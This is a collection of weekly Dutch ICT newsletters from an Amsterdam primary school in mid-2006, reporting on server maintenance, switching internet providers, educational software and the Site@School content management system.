Het S@S Development Team (Fred, Karin, Dirk) is uit eten geweest. Tijdens die maaltijd hebben we de toekomst van siteatschool besproken. We zijn het er alle drie over eens, dat het programma voorlopig geen verdere uitbreiding nodig heeft. Maar meer hierover in een komende BIC.

Groeten en een prettig laang weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-06-06 w23

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 23 - 2006 (9 juni)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ICT FORMULIEREN

Willen de collega's van de Rosa Boekdrukker de evaluatie formulieren inleveren? (alleen degenen die dat nog niet hebben gedaan, natuurlijk).
We gaan kijken wat en òf er volgend jaar nog "geschoold" moet worden. En wat er moet worden bijgesteld aan de ICT leerlijn. We zitten erover te denken om het kinderen leren zoeken op het INTERNET anders aan te pakken. Het programma "digiwijzer" wordt namelijk niet aangepast aan vernieuwde sites, dus daar hebben we niks meer aan.

HET BLAUWE BOEKJE (spelling)

In de BIC van week 14 wordt naar aanleiding van de spelfout stiekum/stiekun in BIC week 13, door ons verwezen naar deze site.
Naar aanleiding van een gesprek tussen Dirk en Karin over het woord insekt/insect, kwamen we te praten over het "witte boekje". Karin beweerde, dat er ook een blauwe versie is. Dirk geloofde het niet. Dus met de functie "zoeken" in S@S op "spelfout" kwamen we weer op bovengenoemde sites.
Raad eens wat er aan de hand was!.............................
De eerste inzender met het goede antwoord krijgt van ons het blauwe boekje kado.

KLOKHUIS

Al een aantal jaren houden we op onze site de KLOKHUIS agenda bij. Gisteren kwam er weer een nieuwe lijst.
Kijkt u maar.

SERVER

Gisteren opeens een vreemde storing van de server. Er bleek geen verbinding meer mogelijk en zelfs de monitor gaf geen beeld meer. Server afgezet en weer opgestart. Er bleek een hardddisk fout. Overleden? Het was de tweede backup disk, dus niet veel aan de hand. Merkwaardiger was dat ie 't bij het opnieuw opstarten weer deed. Het is de oudste disk in de server, dus mogelijk aan vervanging toe. We kijken er naar in de zomervakantie.

XS4ALL

We zijn eindelijk van UPC af en zitten nu, net als 'alle' scholen bij XS4ALL. We hadden vaak klachten en de laatste tijd viel de snelheid vaak terug. "Dat ligt aan uw kabels" zei meneer UPC (echt waar!). Contact met XS4ALL leerde ons dat volgend jaar, wanneer de KPN scholenactie afloopt, onze voormalige tante Pos de scholenactie vervolgt. Niet meer met een gratis aanbod, maar wel met een zeer aantrekkelijke aanbieding.. Meer wilde de mevrouw niet loslaten. We hebben geen last meer van trage connectie met het internet en sparen ook nog eens € 75 per maand.
Onze kabels zijn prima.

Groeten en een prettig weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-06-13 w24

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 24 - 2006 (16 juni)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

HET BLAUWE BOEKJE (spelling)

De eerste inzender met de oplossing was Emilie. Ja, het was een 1 april grap. Ze heeft een exemplaar van het blauwe boekje gewonnen. Ze is er reuze blij mee.

VOLUMEREGELING

Leerkrachten van OBSRB: het volume van het in de computer ingebouwde speakertje kan niet met een knopje geregeld worden omdat dat niet bestaat. Er zijn twee manieren om het volume te regelen:
1. In de taakbalk zie je rechts een 'luidsprekertje'. Met de rechtermuisknop klik je 1 x op het luidsprekertje. De volumeregelaar wordt zichtbaar en je kunt met de muis het volume hoger en lager zetten.
2. Je kunt de toetscombinatie [Alt+] of [Alt-] gebruiken. De tweede manier is handig voor programma's die beeldvullend zijn waardoor de taakbalk niet (meer) zechtbaar is.

PRESENTATIE MET GELUID

Leerkracht Maarten wil een presentatie maken met geluid. Dan moet je geluid kunnen opnemen en bewerken. Wij vonden het gratis open source programma 'AUDACITY' op:
http://audacity.sourceforge.net/
Binnen een paar minuten konden we geluid opnemen, bewerken en opslaan als mp3 bestand. Een aanrader.
We ondervonden weer het nadeel van geluidkaarten in computers en goedkope microfoons: de microfoon ingang van de geluidkaart is niet gevoelig genoeg.We hebben nog een oud microfoonversterkertje van Dirk gevonden dat het microfoon signaal versterkt. We zoeken naar een oplossing die voor iedereen werkt.

DIGITALE PRENTENBOEKEN

Wij zijn altijd op zoek naar uitbreiding van onze digitale prentenboeken. Deze week stond er een link in de POLS (primair onderwijs link service) nieuwsbrief. Kijk hier naar Het Toverstokje.

MAATWERK

We hadden weer een scholing over het programma Maatwerk. Het blijkt, dat er nu ook een "routeboekje" is uitgebracht. Daarin staan twee trajecten om Maatwerk te gebruiken. Jammer, dat we van Malmberg zelf die informatie niet krijgen. Er is vast een nieuwsbrief, waar we ons niet vooor hebben opgegeven.
We gingen een formulier voor het diagnostisch gesprek printen en toen bleek, dat onze laserprinters niet goed staan ingesteld. Groene letters in een grijze balk worden WIT geprint. Onleesbaar. Dus die formulieren printen op de copier tot we de lasers goed hebben staan.

LEESLADDER

Er zit een fout in onze Leesladder 1. Het lijkt erop, alsof er iets in een Database vol is gelopen. Zwijsen kan ons niet helpen. We hebben nu bedacht, dat we in de zomervakantie, als we toch een nieuwe harde schijf in de server gaan zetten, meteen de Leesladder opschonen. Alle leerlingen eruit die er niet (meer) mee werken. Dan kijken we volgend jaar, of het probleem zich weer voordoet. In de tussentijd, hebben we de leerlingen die met Ladder 1 werken in Ladder 2 gezet. Ook nuttig.
We hebben ook nog bij Zwijsen geïnformeerd of er een nieuwe versie aankomt.

GLASVEZEL

Blijkbaar is het een hot item, want overal lezen we erover: het gratis KPN internet aanbod loopt in 2007 af. Nu denkt Kennisnet, dat scholen glasvezel verbinding nodig hebben.
Nou, wij vinden deze XS4ALL verbinding op onze pentium 4 computers al zo lekker snel. Dat ligt natuurlijk ook aan ons prima netwerk, enzo. Maar we voelen ons nog steeds niet achterlopen. Laat ze maar lekker vezelen in Nederland. Wij kijken graag een tijdje toe.

S@S IN STAMPEIWORKSHOP

Ronald en Dirk gaven een demonstratie van Site@School op een thematische workshop van Stampei (samenwerkingsverband van ABC, CIAO, QLICT). Het merendeel van de deelemers (19) vonden het een interessant CMS. We kregen al e-mails binnen van enthousiastelingen die ermee aan de slag willen. Bedankt Jan, voor de gastvrijheid!

UPC/CHELLO/A2000/PRIORITY TELECOM

We hebben opgezegd en zullen jullie het verhaal besparen van hoe dat ging. Dirk: "Als we al niet opgezegd hadden zouden we het na deze fax- en telefonades alsnog doen".

XS4ALL

Als vervolg op het bovenstaande. We konden nu ook onze domeinnaam verhuizen. Het domein rosaboekdrukker.nl was bij UPC gehost. We gebruikten het niet. Maar dat gaat veranderen. We gaan het Site@School forum bij XS4ALL hosten onder de naam: siteatschool.rosaboekdrukker.nl.

Groeten en een prettig weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-06-22 w25

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 25 - 2006 (23 juni)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

EDUCATIEVE TV IN DE KNEL

De nieuwe mediawet biedt geen garanties voor het maken van goede educatieve programma’s voor allerlei verschillende doelgroepen. Daar zijn we bezorgd over.
Op dinsdag 27 juni wordt op initiatief van Teleac/NOT in Den Haag een petitie aangeboden, die mede is ondertekend door verschillende organisaties waarmee we samenwerken.
Teken de petitie.

STUDIEDAG

Deze week kwam tijdens de studiedag ook ICT aan de orde. Karin gaf een terugblik en een vooruitblik over het reilen en zeilen van alle ICT voornemens en plannen. Dat gebeurde met "PRESENTATIE" (voor de Microsoft addicten: powerpoint). o.a. kwam aan de orde, dat ze meer als coach gaat werken. Een uitgebreid verslag in de volgende BIC.

AMBRASOFT  TAFELS

In groep 4 zijn de leerlingen helemaal verslingerd aan dit programma. Al een stuk of zes kinderen hebben alle tafeldiploma's gehaald. Om ze blijvend te laten werken met het programma wordt voorgesteld: "Vind je het goed, dat alle gegevens worden weggehaald, en dat je alles opnieuw doet, maar dan in kortere tijd?"
Ja!!!!!!!
Dus de leerlingen doen alle diploma's eerst in 150 seconden, dan in 120 seconden, en nu is er een aantal bezig in 90 seconden.

KOPTELEFOONS IN KLEUTERBOUW

We hebben 10 nieuwe koptelefoons voor de 5 cassetterecorders in de kleuterbouw aangeschaft. We hebben ze kleuterbomvrij gemaakt door de oorschelpen vast te lijmen (nee, niet op de kleuterhoofdjes) en met 1 secondelijm de hoofdgrootte instelling vast te zetten op kleuterhoofdgrootte.

KLANKIE

In groep 2 bevalt het sprekende toetsenbord prima. Zo goed dat de leerkrachten vroegen of er niet meer woorden aan toegevoegd konden worden. Telefoontje naar de helpdesk leerde dat dat NIET kan. Hm, dat maakt klankie wel zeer beperkt.

WERKSTUK WEG EN GEVONDEN

Yasmina was haar werkstuk kwijt. Het backup systeem werkte prima, maar een leerkracht is (nog ) niet in staat om het werkstuk zelf terug te zetten. Daar moet nog wat uitleg tegenaan.

NATUUR EN TECHNIEK: NatuNiek

Wij zijn op zoek naar een biologiemethode en nu is het oog van de commissie gevallen op een nog uit te komen methode: NatuNiek. Komt in het voorjaar uit. Ze hebben wel een nieuwsbrief, de eerste staat nu online. Kijk en oordeel!

TV MODULE

Af en toe loopt de TV module vast. De cache van de webpagina's is dan vol. Vervelend, want dan moet je 'm eerst met de hand legen. We zouden een truc moeten hebben dat de cache dagelijks geleegd wordt. Hm, dat zou toch eenvoudig moeten zijn.

Groeten en een prettig weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-06-29 w26

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 26 - 2006 (30 juni)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Deze week was er weinig tijd voor ICT wegens ADV en bezoek aan Artis.

STUDIEDAG

Zoals beloofd het verslag van de studiedag van vorige week.

Volgens de afspraken van een aantal jaren geleden hadden we al bereikt moeten hebben: dat leerkrachten:
zelfstandig kunnen omgaan met het uitgestippelde ICT traject op gebied van ICT vaardigheden en onderwijskundige toepassingen
en dat leerlingen:
de school verlaten met de vaardigheden om een werkstuk te maken met gebruik van tekstverwerkingsprogramma en goed gebruik van internet.

Dat is grotendeels gerealiseerd. Hier en daar is nog bij de leerkrachten de behoefte aan wat ondersteuning op gebied van vaardigheden. De ICT coördinator wil volgend schooljaar meer als coach van de klassenleerkrachten gaan optreden: regelmatig overleg over het uitgestippelde traject.

We deden verslag van de hardware en ons netwerk. Wat er allemaal is gebeurd het afgelopen jaar. Daaruit kwam de wens naar boven om de beheerders van het netwerk te onderwerpen aan een soort “eed van vertrouwen”. Er zijn mensen die doordat ze het beheer doen, toegang hebben tot vertrouwelijke informatie. Daar moet je afspraken over vastleggen. Een klus voor het volgende schooljaar.

We hebben over SiteAtShool verslag gedaan en de wens geuit om volgend schooljaar meer mensen ermee te laten werken. Eerst een keer een plenaire demonstratie : hoe werkt S@S?? Foto’s op de website zetten, maar ook: hoe zet je informatie op de website.
Naar aanleiding van de ingevulde evaluatieformulieren hebben we zicht op de wensen van het team. Daarnaast moeten we beslissen wat we met de ondersteuning/scholing van de onderwijsbegeleidingsdienst doen. a.s. maandag komt daar meer duidelijkheid over. We gaan in elk geval meer scholingen zelf verzorgen voor de teamleden. We hebben nu een beamer.

We willen ook kijken of we volgend schooljaar aandacht kunnen besteden over VEILIG INTERNETTEN door middel van een ouderavond. Documentatie is aangevraagd bij http://www.iksurfveilig.nl/

Ook gaan we bekijken of de leerkrachten zelf met ESIS zullen kunnen omgaan.

Gelukkig kan er ook volgend jaar weer ruimte in de formatie gemaakt worden voor ICT. Ongeveer anderhalve dag per week.

SITES OM NADER TE BEKIJKEN:

http://www.iksurfveilig.nl/http://leerkracht.kennisnet.nl de zoekmachine op kennisnet: davindi http://woordenlijst.org (taalunie)

Volgende week weer allerlei belevenissen, zoals het bezoek van een buitenlandse gast die graag het Site@School team wilde ontmoeten.

Groeten en een prettig weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-07-06 w27

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 27 - 2006 (7 juli)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Drukke week!!

We danken de mensen die regelmatig onze vragen beantwoorden hartelijk. We kunnen nu verder op zoek naar veilig internet cursussen, een manier om de cache van onze monitor bij te houden. En vooral: waar moeten beheerders van netwerken voor tekenen (privacy)
Dank voor jullie oplettendheid! (Dennis, Raoul, Emilie)

EVALUATIE met SCHOOLBEGELEIDINGSDIENST

Afgelopen maandag werd de begeleiding van ABC/STAMPEI geëvalueerd. Lees hier het verslag.
Volgend jaar zal de jarenlange intensieve begeleiding worden geminimaliseerd. Niet dat alles nou klaar is, want met ICT is nooit iets af, maar het werd behoorlijk moeilijk om de juiste mensen op de juiste plek op het juiste tijdstip bij elkaar te brengen. Dus nu gaan we binnen de school de coördinatierol van de ICT-coördinator meer ombuigen naar een coachende rol.
Door het schrijven van het evaluatieverslag ontstond opeens het begin van een nieuw beleidsplan voor de periode 2006-2009. Sneak preview.

7 JAAR ONLINE!!

Bij het opruimen vonden we oude financiële stukken waarbij ook de aansluitkosten voor onze internet aansluiting bij A2000 (later UPC en weer later Priority-telecom genaamd). Dat was in juni 1999!!!
In het begin was het maar met één computer. En al snel werd er een mini netwerk aangelegd.

BACK-UP

Deze week was Jasmina uit groep 6 weer haar document kwijtgeraakt. O, wat waren we weer blij met ons back-up systeem, want binnen een paar minuten had ze haar werkstuk weer terug. Hoe dat moet, zal volgend jaar ook worden uitgelegd aan de collega's.

BUITENLANDS BEZOEK

Wij kregen bezoek van John, professor aan de universiteit van Aizu in Japan. Hij was toevallig in Nederland, zijn afdeling wil voor studenten en docenten Site@School gebruiken en had nog wat vragen.
Hij vind S@S een zeer goed systeem, qua onderwijskunidge achtergrond (de ideologie) en qua functionaliteit. Hij roemde de eenvoud.
Verder liet hij ons nog een interessante computertoepassing zien: hotspots op papier. Met een webcam ter grootte van je pink kun je over bedrukt papier heen gaan en zodoende extra info uit 't papier halen.
Geinteresseerd? Het artikel kunnen we aan belangstellenden toesturen.

STROOMSTORING

Door stroomstoring viel de server uit. Zijn de batterijen in het UPS nog goed? Moeten we binnenkort maar eens testen. De stroomstoring duurde, naar men vremoedde, maar heel kort. Dt maakt 't verdacht dat de server uitviel.

HARDDISK WEER VOL

Door zeer intensief gebruik van de server voor zeer grote bestanden (foto's, presentaties met geluid) liep de home partitie weer vol. Wat opschonen gaf ruimte, maar de server moet in de grote vakantie met grotere harddisks worden opgetuigd. MAAAAARRR, daarnaast moet ook enige kritische zin bij het maken en uploaden van foto's worden betracht. Er is een leerkracht die maar raak knipte en de hele zaak, rijp en rot (mislukte foto's, fotos niet rechtop gezet) op de server dumpte. Dat kan natuurlijk niet. We hebben de zaak er zo weer afgekegeld.

MAARTEN

Maarten werkt aan de afscheidspresentatie van groep 8. Met Audacity (zie vorige BIC) maakt hij twee geluidssporen (muziek en leerlingen die vertellen) en mixte het naar 1 spoor . Veel leuke foto's van leerlingen erbij en hij heeft een spetterende presentatie. We weten nog steeds niet hoe je meerdere plaatjes onder 1 geluidsbestand zet in OOo's Impress. Wie wel?

ALICE

Over de telefoon hielpen we Alice (kleuterbouw) met de installatie van WinSCP, het programmaatje waarmee leerkrachten van huis uit op de server kunnen werken. Alice hoeft nu niet meer haar USB stick te vergeten. Van huis uit kan ze bij al hgaar spullen op school.

BOEKDRUKKERTJE

Elke twee weken komt er een nieuwsbrief aan de ouders uit, het "boekdrukkertje". Nog niet zo erg veel ouders hebben de ON-LINE mogelijkheid ontdekt. Maar u, trouwe lezer, zullen we nog even laten kijken. Deze week stond in het Boekdrukkertje de formatie van ons team voor volgend jaar.

LEERLINGPAGINA AANVRAAG

Sinds de mogelijkheid op onze site bestaat om online een leerlingpagina aan te vragen, hebben al diverse leerlingen dat gedaan. Ook leerlingen die allang een pagina hebben. Ook een kleuter wilde een pagina. We wachten nu vol spanning af, wat er op de pagina te lezen zal zijn.

ALLES TELT

In de kleuterafdeling wordt het programma nog steeds gebruikt. Deze week was een collega vergeten hoe de instelling van de afroeplijst moest worden uitgeschakeld. Sind er vorig jaar een verbetering in het programma is aangebracht (patch), is het ook mogelijk om zonder het hele programma af te sluiten, een andere leerling aan te klikken.

TAFELS GROEP 5

Deze week zijn de leerlingen in groep 5 ook begonnen om hun tafel diploma's in een snellere tijd te halen. De leerlingen worden voor de tweede keer ingevoerd -met een 2 achter hun voornaam- als ze alle diploma's hebben gehaald. De zweetdruppels vlogen in het rond. 50 sommen in 90 seconden!

STANDAARD DOCUMENTEN

We zijn bezig om op onze server in de map TEAM allerlei handige documenten te zetten die iedereen mag/kan gebruiken. We worden, als team, steeds digitaler.

BUITENLANDS BEZOEK

Wij kregen bezoek van John, professor aan de universiteit van Aizu in Japan. Hij was toevallig in Nederland, zijn afdeling wil voor studenten en docenten Site@School gebruiken en had nog wat vragen.
Hij vind S@S een zeer goed systeem, qua onderwijskunidge achtergrond (de ideologie) en qua functionaliteit. Hij roemde de eenvoud.
Verder liet hij ons nog een interessante computertoepassing zien: hotspots op papier. Met een webcam ter grootte van je pink kun je over bedrukt papier heen gaan en zodoende extra info uit 't papier halen.
Geinteresseerd? Het artikel kunnen we aan belagstellenden toesturen.

STROOMSTORING

Door stroomstoring viel de server uit. Zijn de batterijen in het UPS nog goed? Moeten we binnenkort maar eens testen. De stroomstoring duurde, naar men vremoedde, maar heel kort. Dt maakt 't verdacht dat de server uitviel.

HARDDISK WEER VOL

Door zeer intensief gebruik van de server voor zeer grote bestanden (foto's, presentaties met geluid) liep de home partitie weer vol. Wat opschonen gaf ruimte, maar de server moet in de grote vakantie met grotere harddisks worden opgetuigd. MAAAAARRR, daarnaast moet ook enige kritische zin bij het maken en uploaden van foto's worden betracht. Er is een leerkracht die maar raak knipte en de hele zaak, rijp en rot (mislukte foto's, fotos niet rechtop gezet) op de server dumpte. Dat kan natuurlijk niet. We hebben de zaak er zo weer afgekegeld.

SITE@SCHOOL FIXPACK

Voor de gebruikers van Sie@School 2.4: Vrijdag 7 juli of anders morgen komt er een fixpack beschikbaar. De laatstelijk gevonden bugs en een paar security fiexes  zijn daarin verwerkt.  Downloaden en installeren dus Damen Heren!

Groeten en een prettig weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-07-14 w28

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 28 - 2006 (14 juli)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

De vakantie komt er aan. Wel een drukke week, maar weinig ICT. Veel opruimen waardoor er opeens een doos vol toetsenborden en netsnoeren uit een lokaal tevoorschijn kwam.

Wie heeft er belangstelling voor een Promise FASTTRAK HD controller met twee  HOT SWAP drive bays. Goed voor Raid. Draait ook onder Linux.

POWERPOINT/IMPRESS

Maarten had een fantastische presentatie gemaakt voor de afscheidsavond van groep 8. Flitsende dia's met twee sporen geluid eronder. Jammer genoeg moest het in Powerpoint, want het lukte ons niet met Impress, want 1 doorlopend geluidsspoor met meerdere dia's eronder lukte ons (nog??) niet.

MET WOORDEN IN DE WEER

We gingen van de week op bezoek op de faculteit Letteren bij Marianne Verhallen.

Doelen van het gesprek:
- Wil MWidW meewerken aan ons initiatief om software te ontwikkelen voor MWidW?
- Kan software ontwikkeling een bijdrage leveren aan Met Woorden In De Weer, en zo ja, waar?

We leggen Marianne uit wat de afd. ICT zoal gedaan heeft in de afgelopen jaren: Site@School en ServerAtSchool. Dat we 'voor de wereld' ontwikkelen. Dat, als er iets ontwikkeld wordt, het Open Source software zal zijn onder de GPL (General Public License). Software waar door iedereen aan mee-ontwikkeld kan worden. Het is voor de wereld, dus gratis te downloaden. Marianne verklaart zich in Principe bereid tot medewerking. De naam 'Met Woorden in de Weer is beschermd'. Nadere afspraken zijn nodig als zaken concreet worden.
Enkele gedachten:
- software zoeken/laten ontwikkelen waarmee clusters/woorden geregistreerd kunnen worden en weer toegankelijk te maken zijn.
- consolideeroefeningen zoek/maken
- een samenwerking starten met de Amsterdamse scholen die met MWidW werken.

BEZOEK voor SERVERATSCHOOL

We kregen Floris op bezoek; jarenlang systeembeheerder op een middelbare school en nu student in Delft. Hij was Peter aldaar tegengekomen en Dirk had jaren gelden als eens contact met hem gehad over een IRC server. Floris kwam naar ServerAtSchool kijken en liet zich inwijden in de darmen van het systeem. Dirk snapte niets van blobs,  symlinks, chroot jail,  maar Floris vond 't zeer ingenieus en diep doordacht.

ESIS UPDATE

Omdat Peter toch op school was deed ie voor de afwisseling maar eens de update op school in plaats van vanuit Bussum. We zijn weer up to date.

Groeten en een prettig weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-07-21 w29

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 29 - 2006 (21 juli)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

De vakantie is aangebroken, vandaag om 12.00 uur.  Toch hebben we wat op ICT gebied gedaan.

OPRUIMING

We zijn begonnen aan een opruimactie in de mappen van de groepen en de leerlingen op de server. Aan het einde van de zomervakantie moeten de groepen gemigreerd worden. Dat kan pas als de EDEX bestanden klaar zijn. Voor de leken: als de leerlingen in de administratie van de school kloppend in de groepen zitten, wordt er een computerbestand gemaakt (genaamd EDEX) en dat gebruiken wij weer in ons netwerksysteem om de groepen op de server door te schuiven.

NOT/TELEAC

Naar aanleiding van de petitie in BIC week 25 kregen we van de week een aardige dank voor onze steunbetuiging. Lees meer. De school tv is voorlopig gered.

SITE@SCHOOL VERGADERNG

We hebben een vergadering gehouden (met BBQ) over de toekomst van Site@School, verdere ontwikkelingen. En waaraan we in de komende twee jaar aandacht gaan besteden. Meer nieuws na de zomervakantie.

OPEN OFFICE ORG PRESENTATIE

Het blijkt nu definitief dat je met OOo Presentatie niet meerdere dia's onder één geluidsfragment kan zetten. Het staat ook laag op de prioriteitenlijst bij de ontwikkelaars.
Er is een gratis programma (niet OSS) waarmee het wel kan en nog simpel en snel ook. Een progje om karaoke's te maken: Karaoke Fun. Het programma is ook in het Nederlands. Zie: http://www.karafun.com/index_nl.html We houden ons aanbevolen voor een OSS alternatief.

NIEUWE HARDDISKS IN SERVER

Volgende week zullen we nog een dag naar school gaan om groot onderhoud te verrichten. Er komen drie nieuwe harde schijven in de server.
SPECIFICATIES: 250GIG, MAXTOR

SITE@SCHOOL OPGESCHOOND

Bij ons, waar ooit versie 1.0 van S@S draaide, zat nog een hele hoop oude troep in S@S. Peter maakte een lijst met zo'n 100 bestanden die niet meer in gebruik zijn. Die hebben we in overleg met Fred gewist.
Eén en ander betekent voor andere gebruikers dat ze in hun systeem ook files kunnen hebben die niet meer gebruikt worden. Een file list zou handig zijn.

MET WOORDEN IN DE WEER

Barry gaat met woorden in de weer! Nu we van het MWidW team het groene licht hebben om consolideeroefeningen te ontwerpen kan Barry met Edukitty aan de slag. Dat zal begin volgend jaar gebeuren als we ook de hulp van een student van MWidW hebben.  We zijn op zoek naar scholen in Amsterdam die ook MWidW gebruiken. Als jullie scholen weten, graag doorgeven.
by the way:
Vandaag tijdens de pauze met een aantal collega's bedacht: onze kerstquiz is een prima middel om te consolideren. Bijvoorbeeld: wat is de juiste betekenis van TRANSPARANT?
1. zweet
2. doorzichtig
3. een soort vrachtauto

SERVERATSCHOOL MET XP

Goed nieuws voor allen die zaten te wachten op XP in ServerAtSchool  ( http://serveratschool.nl ). De vooronderzoeken zijn klaar en de financiering is rond. In de zomervakantie beginnen we met de ontwikkeling. Dat wil zeggen; de zo veilig mogelijke integratie van XP in ServerAtschool en SABRINE (Semi Automatich Backup and Restore in a Network Environment), op een dusdanige manier dat de gebruikers zo weinig mogelijk last van XP hebben en net zo makkelijk is als nu images kunnen terugzetten met Sabrine.
Volgens de planning moet  in oktober de zaak draaien.
Nu wordt 't helemaal een hete zomer!

Groeten en een prettige vakantie!
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-07-27 w30

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 30 - 2006 (28 juli)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Het is vakantie voor de leerlingen en de leerkrachten, maar niet voor enkele noeste ICT werkers; Peter en ondergetekenden

WERKSTATIONS AFKOPPELEN

Vanwege de grote schoonmaak in de school moesten alle computers die op verrijdbare tafels staan worden losgekoppeld van het netwerk. Na de schoonmaak, in de week voor de school weer begint, sluiten we ze weer aan.

UNIVERSITEIT VAN AIZU (JAPAN)

We kregen bericht van John, professor aan de universiteit van Aizu dan zijn Center for Language Research Site@School als CMS gebruikt.
Zie: http://clrweb.u-aizu.ac.jp/cms

SERVERONDERHOUD

Het vollopen van onze systeemdisk van 80 GigaByte noopte ons tot het vervangen van die disk  voor een groter  exemplaar. Omdat we toch bezig waren hebben we de andere disks (backups en budies-disk) meteen ook maar vervangen. Er zitten nu drie HD's van ieder 250 GB in de server. We hebben ook maar meteen de HD flatcables vervangen.
Het vervangen van de disks en terugzetten van alle data was een precies werkje dat door onze systeembeheerder Peter gedaan werd.

UPS

Tijdens een zeer kleine stroomstoring bleek dat ons Uninterupted Power Supply (noodstroomvoorziening) niet goed werkte. Het UPS voorziet de server tijdelijk van stroom als de stroom uitvalt. Omdat de server toch buiten gebruik was, hebben we het UPS laten controleren. Van de drie accu's bleek er 1 kapot, 1 goed en 1 matig. We hebben ze alledrie vervangen. De controle en de vervanging werden op vakkundige en prettige wijze uitgevoerd door de fa. AVA in de Marnixstraat 41. We kregen ook nog korting op de accu's vanwege dat we een school zijn.
John -onze conciërge- was ook aan het werk en kon gelukkig op woensdag met Dirk de UPS weer ophalen. We willen natuurlijk, dat de server alle hittegolven kan doorstaan, waardoor de website de hele zomer in de lucht blijft en de server bereikbaar voor de "teleworkers".
Op de foto is het onderzoek aan het UPS te zien.

OPRUIMING

Van de rust in de school gebruik gemaakt om eens flink door het papierwerk te spitten. Stapels correspondentie tussen de Rosa Boekdrukker en de firma Malmberg over het programma Letterpret zijn nu geordend, klaar voor de deurwaarder. Ook flink huisgehouden in een berg diskettes van oude DOS-software. Nog programma's uit het "comenius" tijdperk, zoals "de wereld rond tafels" en "thuis in het milieu" klaar gelegd om afgevoerd te worden. Of heeft iemand er nog belangstelling voor??
De opbergdozen voor diskettes zijn al wel met de vuilnisman mee.
Ook liggen er stapels CD-roms met in onbruik geraakte programma's. Na de vakantie wordt er een lijst gepubliceerd. Dan mogen liefhebbers ze komen ophalen.
Trouwens, de handenarbeidjuf was ook nog aan het werk. Kijk maar.

Groet, en nu toch echt vakantie! Karin
Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

Schooljaar 2006-2007

 1. 2006-09-04 w36
 2. 2006-09-14 w37
 3. 2006-09-18 w38
 4. 2006-09-25 w39
 5. 2006-10-02 w40
 6. 2006-10-10 w41
 7. 2006-10-17 w42
 8. 2006-10-18 w42
 9. 2006-11-02 w44
 10. 2006-11-08 w45
 11. 2006-11-16 w46
 12. 2006-11-23 w47
 13. 2006-11-27 w48
 14. 2006-12-07 w49
 15. 2006-12-08 w49
 16. 2006-12-21 w51
 17. 2007-01-10 w02
 18. 2007-01-19 w03
 19. 2007-01-26 w04
 20. 2007-02-02 w05
 21. 2007-02-08 w06
 22. 2007-02-15 w07
 23. 2007-02-20 w08
 24. 2007-03-10 w10
 25. 2007-03-15 w11
 26. 2007-03-22 w12
 27. 2007-04-03 w14
 28. 2007-04-10 w15
 29. 2007-04-19 w16
 30. 2007-04-23 w17
 31. 2007-05-08 w19
 32. 2007-05-21 w21
 33. 2007-05-31 w22
 34. 2007-06-04 w23
 35. 2007-06-11 w24
 36. 2007-06-20 w25
 37. 2007-06-25 w26
 38. 2007-07-05 w27

2006-09-04 w36

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 36 - 2006 (8 september)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

We gaan er weer tegenaan!

WERKSTATIONS AANSLUITEN

Traditiegetrouw troffen we de inventaris van de school, na de grote jaarlijkse schoonmaak, aan als puinhoop. De afgekoppelde werkstations moesten weer worden aangesloten; soms op andere plaatsen en er moesten extra computers bij. De computers waar Veilig Leren Lezen op staat moesten naar andere klassen verhuizen.
Alles bij elkaar drie dagen werk voor Dirk. De zaak draait (bijna) weer als vanouds.

MET WOORDEN IN DE WEER

Voor de vakantie hadden Karin en Dirk een gesprek met Marianne Verhallen, één van de uitvinders van de MWidW methode. We bespraken de problemen die de OBSRB met MWidW heeft en de mogelijke oplossingen met behulp van ICT. Marianne had er wel oren naar. Wij wilden graag in contact komen met de Amsterdamse MWidW scholen om ervaringen uit te wisselen en te kijken of er draagvlak is voor MWidW met ICT. Dirk peilde de 16 Amsterdamse scholne die MWidW gebruiken.
